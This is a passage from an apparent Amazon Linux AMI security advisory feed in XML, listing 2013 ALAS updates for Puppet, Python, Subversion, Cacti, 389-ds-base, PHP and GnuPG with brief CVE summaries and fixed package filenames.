id="CVE-2013-2852" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3222" title="" id="CVE-2013-3222" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3224" title="" id="CVE-2013-3224" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3225" title="" id="CVE-2013-3225" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3301" title="" id="CVE-2013-3301" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-tools-debuginfo" version="3.4.57" release="48.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-3.4.57-48.42.amzn1.x86_64.rpm</filename></package><package 
name="kernel-tools" version="3.4.57" release="48.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-3.4.57-48.42.amzn1.x86_64.rpm</filename></package><package name="kernel" version="3.4.57" release="48.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-3.4.57-48.42.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="3.4.57" release="48.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-3.4.57-48.42.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="3.4.57" release="48.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-3.4.57-48.42.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="3.4.57" release="48.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-3.4.57-48.42.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="3.4.57" release="48.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-3.4.57-48.42.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="3.4.57" release="48.42.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-3.4.57-48.42.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="3.4.57" release="48.42.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-3.4.57-48.42.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="3.4.57" release="48.42.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-3.4.57-48.42.amzn1.i686.rpm</filename></package><package name="kernel" version="3.4.57" release="48.42.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-3.4.57-48.42.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="3.4.57" release="48.42.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-3.4.57-48.42.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="3.4.57" 
release="48.42.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-3.4.57-48.42.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="3.4.57" release="48.42.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-3.4.57-48.42.amzn1.i686.rpm</filename></package><package name="kernel-doc" version="3.4.57" release="48.42.amzn1" epoch="0" arch="noarch"><filename>Packages/kernel-doc-3.4.57-48.42.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-219</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-219: medium priority package update for puppet</title><issued date="2013-09-04 13:30:00" /><updated date="2014-09-15 23:21:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-4956:
Puppet Module Tool (PMT), as used in Puppet 2.7.x before 2.7.23 and 3.2.x before 3.2.4, and Puppet Enterprise 2.8.x before 2.8.3 and 3.0.x before 3.0.1, installs modules with weak permissions if those permissions were used when the modules were originally built, which might allow local users to read or modify those modules depending on the original permissions.
996855:
CVE-2013-4956 Puppet: Local Privilege Escalation/Arbitrary Code Execution
CVE-2013-4761:
Unspecified vulnerability in Puppet 2.7.x before 2.7.23 and 3.2.x before 3.2.4, and Puppet Enterprise 2.8.x before 2.8.3 and 3.0.x before 3.0.1, allows remote attackers to execute arbitrary Ruby programs from the master via the resource_type service. NOTE: this vulnerability can only be exploited utilizing unspecified "local file system access" to the Puppet Master.
996856:
CVE-2013-4761 Puppet: resource_type service code execution
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4761" title="" id="CVE-2013-4761" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4956" title="" id="CVE-2013-4956" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="puppet-debuginfo" version="2.7.23" release="1.0.amzn1" epoch="0" arch="x86_64"><filename>Packages/puppet-debuginfo-2.7.23-1.0.amzn1.x86_64.rpm</filename></package><package name="puppet" version="2.7.23" release="1.0.amzn1" epoch="0" arch="x86_64"><filename>Packages/puppet-2.7.23-1.0.amzn1.x86_64.rpm</filename></package><package name="puppet-server" version="2.7.23" release="1.0.amzn1" epoch="0" arch="x86_64"><filename>Packages/puppet-server-2.7.23-1.0.amzn1.x86_64.rpm</filename></package><package name="puppet-debuginfo" version="2.7.23" release="1.0.amzn1" epoch="0" arch="i686"><filename>Packages/puppet-debuginfo-2.7.23-1.0.amzn1.i686.rpm</filename></package><package name="puppet" version="2.7.23" release="1.0.amzn1" epoch="0" arch="i686"><filename>Packages/puppet-2.7.23-1.0.amzn1.i686.rpm</filename></package><package name="puppet-server" version="2.7.23" release="1.0.amzn1" epoch="0" arch="i686"><filename>Packages/puppet-server-2.7.23-1.0.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-220</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-220: medium priority package update for python27</title><issued date="2013-09-04 13:31:00" /><updated date="2014-09-15 23:21:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-4238:
The ssl.match_hostname function in the SSL module in Python 2.6 through 3.4 does not properly handle a '\0' character in a domain name in the Subject Alternative Name field of an X.509 certificate, which allows man-in-the-middle attackers to spoof arbitrary SSL servers via a crafted certificate issued by a legitimate Certification Authority, a related issue to CVE-2009-2408.
996381:
CVE-2013-4238 python: hostname check bypassing vulnerability in SSL module
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4238" title="" id="CVE-2013-4238" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="python27-test" version="2.7.5" release="4.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-test-2.7.5-4.28.amzn1.x86_64.rpm</filename></package><package name="python27-debuginfo" version="2.7.5" release="4.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-debuginfo-2.7.5-4.28.amzn1.x86_64.rpm</filename></package><package name="python27-libs" version="2.7.5" release="4.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-libs-2.7.5-4.28.amzn1.x86_64.rpm</filename></package><package name="python27-tools" version="2.7.5" release="4.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-tools-2.7.5-4.28.amzn1.x86_64.rpm</filename></package><package name="python27-devel" version="2.7.5" release="4.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-devel-2.7.5-4.28.amzn1.x86_64.rpm</filename></package><package name="python27" version="2.7.5" release="4.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-2.7.5-4.28.amzn1.x86_64.rpm</filename></package><package name="python27" version="2.7.5" release="4.28.amzn1" epoch="0" arch="i686"><filename>Packages/python27-2.7.5-4.28.amzn1.i686.rpm</filename></package><package name="python27-devel" version="2.7.5" release="4.28.amzn1" epoch="0" arch="i686"><filename>Packages/python27-devel-2.7.5-4.28.amzn1.i686.rpm</filename></package><package name="python27-test" version="2.7.5" release="4.28.amzn1" epoch="0" arch="i686"><filename>Packages/python27-test-2.7.5-4.28.amzn1.i686.rpm</filename></package><package name="python27-tools" version="2.7.5" release="4.28.amzn1" epoch="0" arch="i686"><filename>Packages/python27-tools-2.7.5-4.28.amzn1.i686.rpm</filename></package><package name="python27-debuginfo" version="2.7.5" 
release="4.28.amzn1" epoch="0" arch="i686"><filename>Packages/python27-debuginfo-2.7.5-4.28.amzn1.i686.rpm</filename></package><package name="python27-libs" version="2.7.5" release="4.28.amzn1" epoch="0" arch="i686"><filename>Packages/python27-libs-2.7.5-4.28.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-221</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-221: medium priority package update for subversion</title><issued date="2013-09-04 13:32:00" /><updated date="2014-09-15 23:21:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-4131:
The mod_dav_svn Apache HTTPD server module in Subversion 1.7.0 through 1.7.10 and 1.8.x before 1.8.1 allows remote authenticated users to cause a denial of service (assertion failure or out-of-bounds read) via a certain (1) COPY, (2) DELETE, or (3) MOVE request against a revision root.
986194:
CVE-2013-4131 subversion: DoS (assertion failure, crash) in mod_dav_svn when handling certain MOVE, COPY, or DELETE HTTP requests
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4131" title="" id="CVE-2013-4131" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="subversion-debuginfo" version="1.7.13" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-debuginfo-1.7.13-1.32.amzn1.x86_64.rpm</filename></package><package name="subversion-python" version="1.7.13" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-python-1.7.13-1.32.amzn1.x86_64.rpm</filename></package><package name="subversion-libs" version="1.7.13" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-libs-1.7.13-1.32.amzn1.x86_64.rpm</filename></package><package name="subversion-javahl" version="1.7.13" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-javahl-1.7.13-1.32.amzn1.x86_64.rpm</filename></package><package name="subversion-devel" version="1.7.13" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-devel-1.7.13-1.32.amzn1.x86_64.rpm</filename></package><package name="mod_dav_svn" version="1.7.13" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod_dav_svn-1.7.13-1.32.amzn1.x86_64.rpm</filename></package><package name="subversion-perl" version="1.7.13" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-perl-1.7.13-1.32.amzn1.x86_64.rpm</filename></package><package name="subversion-tools" version="1.7.13" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-tools-1.7.13-1.32.amzn1.x86_64.rpm</filename></package><package name="subversion-ruby" version="1.7.13" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-ruby-1.7.13-1.32.amzn1.x86_64.rpm</filename></package><package name="subversion" version="1.7.13" release="1.32.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/subversion-1.7.13-1.32.amzn1.x86_64.rpm</filename></package><package name="subversion-perl" version="1.7.13" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-perl-1.7.13-1.32.amzn1.i686.rpm</filename></package><package name="subversion-javahl" version="1.7.13" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-javahl-1.7.13-1.32.amzn1.i686.rpm</filename></package><package name="subversion-python" version="1.7.13" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-python-1.7.13-1.32.amzn1.i686.rpm</filename></package><package name="subversion-ruby" version="1.7.13" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-ruby-1.7.13-1.32.amzn1.i686.rpm</filename></package><package name="subversion-libs" version="1.7.13" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-libs-1.7.13-1.32.amzn1.i686.rpm</filename></package><package name="mod_dav_svn" version="1.7.13" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/mod_dav_svn-1.7.13-1.32.amzn1.i686.rpm</filename></package><package name="subversion-tools" version="1.7.13" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-tools-1.7.13-1.32.amzn1.i686.rpm</filename></package><package name="subversion-debuginfo" version="1.7.13" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-debuginfo-1.7.13-1.32.amzn1.i686.rpm</filename></package><package name="subversion-devel" version="1.7.13" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-devel-1.7.13-1.32.amzn1.i686.rpm</filename></package><package name="subversion" version="1.7.13" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-1.7.13-1.32.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" 
from="linux-security@amazon.com"><id>ALAS-2013-222</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-222: medium priority package update for cacti</title><issued date="2013-09-04 13:33:00" /><updated date="2014-09-15 23:22:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-1435:
(1) snmp.php and (2) rrd.php in Cacti before 0.8.8b allow remote attackers to execute arbitrary commands via shell metacharacters in unspecified vectors.
994616:
CVE-2013-1434 CVE-2013-1435 cacti: SQL injection and shell escaping issues fixed in 0.8.8b
CVE-2013-1434:
Multiple SQL injection vulnerabilities in (1) api_poller.php and (2) utility.php in Cacti before 0.8.8b allow remote attackers to execute arbitrary SQL commands via unspecified vectors.
994616:
CVE-2013-1434 CVE-2013-1435 cacti: SQL injection and shell escaping issues fixed in 0.8.8b
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1434" title="" id="CVE-2013-1434" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1435" title="" id="CVE-2013-1435" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="cacti" version="0.8.8b" release="2.10.amzn1" epoch="0" arch="noarch"><filename>Packages/cacti-0.8.8b-2.10.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-223</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-223: important priority package update for 389-ds-base</title><issued date="2013-09-19 15:02:00" /><updated date="2014-09-15 23:23:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-4283:
ns-slapd in 389 Directory Server before 1.3.0.8 allows remote attackers to cause a denial of service (server crash) via a crafted Distinguished Name (DN) in a MOD operation request.
It was discovered that the 389 Directory Server did not properly handle the receipt of certain MOD operations with a bogus Distinguished Name (DN). A remote, unauthenticated attacker could use this flaw to cause the 389 Directory Server to crash.
999634:
CVE-2013-4283 389-ds-base: ns-slapd crash due to bogus DN
CVE-2013-2219:
The Red Hat Directory Server before 8.2.11-13 and 389 Directory Server do not properly restrict access to entity attributes, which allows remote authenticated users to obtain sensitive information via a search query for the attribute.
It was discovered that the 389 Directory Server did not honor defined attribute access controls when evaluating search filter expressions. A remote attacker (with permission to query the Directory Server) could use this flaw to determine the values of restricted attributes via a series of search queries with filter conditions that used restricted attributes.
979508:
CVE-2013-2219 Directory Server: ACLs inoperative in some search scenarios
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2219" title="" id="CVE-2013-2219" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4283" title="" id="CVE-2013-4283" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="389-ds-base-debuginfo" version="1.3.1.8" release="1.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-debuginfo-1.3.1.8-1.5.amzn1.x86_64.rpm</filename></package><package name="389-ds-base-libs" version="1.3.1.8" release="1.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-libs-1.3.1.8-1.5.amzn1.x86_64.rpm</filename></package><package name="389-ds-base-devel" version="1.3.1.8" release="1.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-devel-1.3.1.8-1.5.amzn1.x86_64.rpm</filename></package><package name="389-ds-base" version="1.3.1.8" release="1.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-1.3.1.8-1.5.amzn1.x86_64.rpm</filename></package><package name="389-ds-base-devel" version="1.3.1.8" release="1.5.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-devel-1.3.1.8-1.5.amzn1.i686.rpm</filename></package><package name="389-ds-base" version="1.3.1.8" release="1.5.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-1.3.1.8-1.5.amzn1.i686.rpm</filename></package><package name="389-ds-base-libs" version="1.3.1.8" release="1.5.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-libs-1.3.1.8-1.5.amzn1.i686.rpm</filename></package><package name="389-ds-base-debuginfo" version="1.3.1.8" release="1.5.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-debuginfo-1.3.1.8-1.5.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-224</id><title>Amazon Linux AMI 2012.09 - 
ALAS-2013-224: medium priority package update for php54</title><issued date="2013-09-19 15:28:00" /><updated date="2014-09-15 23:23:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-4248:
The openssl_x509_parse function in openssl.c in the OpenSSL module in PHP before 5.4.18 and 5.5.x before 5.5.2 does not properly handle a '\0' character in a domain name in the Subject Alternative Name field of an X.509 certificate, which allows man-in-the-middle attackers to spoof arbitrary SSL servers via a crafted certificate issued by a legitimate Certification Authority, a related issue to CVE-2009-2408.
997097:
CVE-2013-4248 php: hostname check bypassing vulnerability in SSL client
CVE-2011-4718:
Session fixation vulnerability in the Sessions subsystem in PHP before 5.5.2 allows remote attackers to hijack web sessions by specifying a session ID.
996774:
CVE-2011-4718 php: session fixation vulnerability allows remote hijacking of sessions
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4718" title="" id="CVE-2011-4718" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4248" title="" id="CVE-2013-4248" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php54-odbc" version="5.4.19" release="1.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-odbc-5.4.19-1.42.amzn1.x86_64.rpm</filename></package><package name="php54-mysql" version="5.4.19" release="1.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mysql-5.4.19-1.42.amzn1.x86_64.rpm</filename></package><package name="php54-debuginfo" version="5.4.19" release="1.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-debuginfo-5.4.19-1.42.amzn1.x86_64.rpm</filename></package><package name="php54-pgsql" version="5.4.19" release="1.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-pgsql-5.4.19-1.42.amzn1.x86_64.rpm</filename></package><package name="php54-fpm" version="5.4.19" release="1.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-fpm-5.4.19-1.42.amzn1.x86_64.rpm</filename></package><package name="php54-process" version="5.4.19" release="1.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-process-5.4.19-1.42.amzn1.x86_64.rpm</filename></package><package name="php54-dba" version="5.4.19" release="1.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-dba-5.4.19-1.42.amzn1.x86_64.rpm</filename></package><package name="php54-recode" version="5.4.19" release="1.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-recode-5.4.19-1.42.amzn1.x86_64.rpm</filename></package><package name="php54-pspell" version="5.4.19" release="1.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-pspell-5.4.19-1.42.amzn1.x86_64.rpm</filename></package><package name="php54-imap" version="5.4.19" release="1.42.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/php54-imap-5.4.19-1.42.amzn1.x86_64.rpm</filename></package><package name="php54-enchant" version="5.4.19" release="1.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-enchant-5.4.19-1.42.amzn1.x86_64.rpm</filename></package><package name="php54-bcmath" version="5.4.19" release="1.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-bcmath-5.4.19-1.42.amzn1.x86_64.rpm</filename></package><package name="php54-snmp" version="5.4.19" release="1.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-snmp-5.4.19-1.42.amzn1.x86_64.rpm</filename></package><package name="php54-soap" version="5.4.19" release="1.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-soap-5.4.19-1.42.amzn1.x86_64.rpm</filename></package><package name="php54-xml" version="5.4.19" release="1.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-xml-5.4.19-1.42.amzn1.x86_64.rpm</filename></package><package name="php54-mssql" version="5.4.19" release="1.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mssql-5.4.19-1.42.amzn1.x86_64.rpm</filename></package><package name="php54-gd" version="5.4.19" release="1.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-gd-5.4.19-1.42.amzn1.x86_64.rpm</filename></package><package name="php54-pdo" version="5.4.19" release="1.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-pdo-5.4.19-1.42.amzn1.x86_64.rpm</filename></package><package name="php54-embedded" version="5.4.19" release="1.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-embedded-5.4.19-1.42.amzn1.x86_64.rpm</filename></package><package name="php54-mbstring" version="5.4.19" release="1.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mbstring-5.4.19-1.42.amzn1.x86_64.rpm</filename></package><package name="php54-common" version="5.4.19" release="1.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-common-5.4.19-1.42.amzn1.x86_64.rpm</filename></package><package name="php54-tidy" 
version="5.4.19" release="1.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-tidy-5.4.19-1.42.amzn1.x86_64.rpm</filename></package><package name="php54-xmlrpc" version="5.4.19" release="1.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-xmlrpc-5.4.19-1.42.amzn1.x86_64.rpm</filename></package><package name="php54-intl" version="5.4.19" release="1.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-intl-5.4.19-1.42.amzn1.x86_64.rpm</filename></package><package name="php54-ldap" version="5.4.19" release="1.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-ldap-5.4.19-1.42.amzn1.x86_64.rpm</filename></package><package name="php54" version="5.4.19" release="1.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-5.4.19-1.42.amzn1.x86_64.rpm</filename></package><package name="php54-devel" version="5.4.19" release="1.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-devel-5.4.19-1.42.amzn1.x86_64.rpm</filename></package><package name="php54-mcrypt" version="5.4.19" release="1.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mcrypt-5.4.19-1.42.amzn1.x86_64.rpm</filename></package><package name="php54-cli" version="5.4.19" release="1.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-cli-5.4.19-1.42.amzn1.x86_64.rpm</filename></package><package name="php54-mysqlnd" version="5.4.19" release="1.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mysqlnd-5.4.19-1.42.amzn1.x86_64.rpm</filename></package><package name="php54-devel" version="5.4.19" release="1.42.amzn1" epoch="0" arch="i686"><filename>Packages/php54-devel-5.4.19-1.42.amzn1.i686.rpm</filename></package><package name="php54-pdo" version="5.4.19" release="1.42.amzn1" epoch="0" arch="i686"><filename>Packages/php54-pdo-5.4.19-1.42.amzn1.i686.rpm</filename></package><package name="php54-gd" version="5.4.19" release="1.42.amzn1" epoch="0" arch="i686"><filename>Packages/php54-gd-5.4.19-1.42.amzn1.i686.rpm</filename></package><package 
name="php54-snmp" version="5.4.19" release="1.42.amzn1" epoch="0" arch="i686"><filename>Packages/php54-snmp-5.4.19-1.42.amzn1.i686.rpm</filename></package><package name="php54-embedded" version="5.4.19" release="1.42.amzn1" epoch="0" arch="i686"><filename>Packages/php54-embedded-5.4.19-1.42.amzn1.i686.rpm</filename></package><package name="php54-tidy" version="5.4.19" release="1.42.amzn1" epoch="0" arch="i686"><filename>Packages/php54-tidy-5.4.19-1.42.amzn1.i686.rpm</filename></package><package name="php54-mysqlnd" version="5.4.19" release="1.42.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mysqlnd-5.4.19-1.42.amzn1.i686.rpm</filename></package><package name="php54-mssql" version="5.4.19" release="1.42.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mssql-5.4.19-1.42.amzn1.i686.rpm</filename></package><package name="php54-mbstring" version="5.4.19" release="1.42.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mbstring-5.4.19-1.42.amzn1.i686.rpm</filename></package><package name="php54-ldap" version="5.4.19" release="1.42.amzn1" epoch="0" arch="i686"><filename>Packages/php54-ldap-5.4.19-1.42.amzn1.i686.rpm</filename></package><package name="php54-dba" version="5.4.19" release="1.42.amzn1" epoch="0" arch="i686"><filename>Packages/php54-dba-5.4.19-1.42.amzn1.i686.rpm</filename></package><package name="php54-imap" version="5.4.19" release="1.42.amzn1" epoch="0" arch="i686"><filename>Packages/php54-imap-5.4.19-1.42.amzn1.i686.rpm</filename></package><package name="php54-xmlrpc" version="5.4.19" release="1.42.amzn1" epoch="0" arch="i686"><filename>Packages/php54-xmlrpc-5.4.19-1.42.amzn1.i686.rpm</filename></package><package name="php54-pspell" version="5.4.19" release="1.42.amzn1" epoch="0" arch="i686"><filename>Packages/php54-pspell-5.4.19-1.42.amzn1.i686.rpm</filename></package><package name="php54-fpm" version="5.4.19" release="1.42.amzn1" epoch="0" arch="i686"><filename>Packages/php54-fpm-5.4.19-1.42.amzn1.i686.rpm</filename></package><package 
name="php54-common" version="5.4.19" release="1.42.amzn1" epoch="0" arch="i686"><filename>Packages/php54-common-5.4.19-1.42.amzn1.i686.rpm</filename></package><package name="php54-bcmath" version="5.4.19" release="1.42.amzn1" epoch="0" arch="i686"><filename>Packages/php54-bcmath-5.4.19-1.42.amzn1.i686.rpm</filename></package><package name="php54-xml" version="5.4.19" release="1.42.amzn1" epoch="0" arch="i686"><filename>Packages/php54-xml-5.4.19-1.42.amzn1.i686.rpm</filename></package><package name="php54-pgsql" version="5.4.19" release="1.42.amzn1" epoch="0" arch="i686"><filename>Packages/php54-pgsql-5.4.19-1.42.amzn1.i686.rpm</filename></package><package name="php54-mysql" version="5.4.19" release="1.42.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mysql-5.4.19-1.42.amzn1.i686.rpm</filename></package><package name="php54-cli" version="5.4.19" release="1.42.amzn1" epoch="0" arch="i686"><filename>Packages/php54-cli-5.4.19-1.42.amzn1.i686.rpm</filename></package><package name="php54-odbc" version="5.4.19" release="1.42.amzn1" epoch="0" arch="i686"><filename>Packages/php54-odbc-5.4.19-1.42.amzn1.i686.rpm</filename></package><package name="php54-enchant" version="5.4.19" release="1.42.amzn1" epoch="0" arch="i686"><filename>Packages/php54-enchant-5.4.19-1.42.amzn1.i686.rpm</filename></package><package name="php54-debuginfo" version="5.4.19" release="1.42.amzn1" epoch="0" arch="i686"><filename>Packages/php54-debuginfo-5.4.19-1.42.amzn1.i686.rpm</filename></package><package name="php54" version="5.4.19" release="1.42.amzn1" epoch="0" arch="i686"><filename>Packages/php54-5.4.19-1.42.amzn1.i686.rpm</filename></package><package name="php54-intl" version="5.4.19" release="1.42.amzn1" epoch="0" arch="i686"><filename>Packages/php54-intl-5.4.19-1.42.amzn1.i686.rpm</filename></package><package name="php54-recode" version="5.4.19" release="1.42.amzn1" epoch="0" arch="i686"><filename>Packages/php54-recode-5.4.19-1.42.amzn1.i686.rpm</filename></package><package 
name="php54-soap" version="5.4.19" release="1.42.amzn1" epoch="0" arch="i686"><filename>Packages/php54-soap-5.4.19-1.42.amzn1.i686.rpm</filename></package><package name="php54-process" version="5.4.19" release="1.42.amzn1" epoch="0" arch="i686"><filename>Packages/php54-process-5.4.19-1.42.amzn1.i686.rpm</filename></package><package name="php54-mcrypt" version="5.4.19" release="1.42.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mcrypt-5.4.19-1.42.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-225</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-225: medium priority package update for gnupg</title><issued date="2013-09-19 15:29:00" /><updated date="2014-09-15 23:24:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-4242:
GnuPG before 1.4.14, and Libgcrypt before 1.5.3 as used in GnuPG 2.0.x and possibly other products, allows local users to obtain private RSA keys via a cache side-channel attack involving the L3 cache, aka Flush+Reload.
988589:
CVE-2013-4242 GnuPG susceptible to Yarom/Falkner flush+reload cache side-channel attack
